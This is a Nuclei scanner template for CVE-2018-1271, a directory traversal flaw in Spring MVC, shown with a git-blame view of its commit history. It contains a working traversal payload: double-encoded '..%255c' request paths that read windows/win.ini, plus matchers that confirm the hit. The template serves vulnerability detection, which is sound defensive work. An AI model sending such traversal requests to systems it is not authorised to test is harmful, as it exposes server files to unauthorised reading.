nuclei-templates/http/cves/2018/CVE-2018-1271.yaml

id: CVE-2018-1271

info:
  name: Spring MVC Framework - Local File Inclusion
  author: hetroublemakr
  severity: medium
  description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability.
  reference:
    - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
    - https://pivotal.io/security/cve-2018-1271
    - https://access.redhat.com/errata/RHSA-2018:1320
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1271
    - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2018-1271
    cwe-id: CWE-22
    epss-score: 0.004
    epss-percentile: 0.73504
    cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: vmware
    product: spring_framework
  tags: cve,cve2018,spring,lfi,traversal,vmware

http:
  - method: GET
    path:
      - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
      - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'for 16-bit app support'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-1271`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00
			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Spring MVC Framework - Local File Inclusion`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`author: hetroublemakr`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`remediation: \|`
			`Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://pivotal.io/security/cve-2018-1271`
			`- https://access.redhat.com/errata/RHSA-2018:1320`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2018-1271`
more updates 2023-07-15 16:29:17 +00:00			`- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 5.9`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2018-1271`
			`cwe-id: CWE-22`
TemplateMan Update [Fri Nov 10 17:07:51 UTC 2023] :robot: 2023-11-10 17:07:52 +00:00			`epss-score: 0.004`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-percentile: 0.73504`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`cpe: cpe:2.3:a:vmware:spring_framework::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: vmware`
			`product: spring_framework`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2018,spring,lfi,traversal,vmware`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`- method: GET`
			`path:`
			`- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
			`- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Fixed default condition OR to AND in false-positives 2020-07-08 11:38:57 +00:00			`matchers-condition: and`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- 'for 16-bit app support'`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950`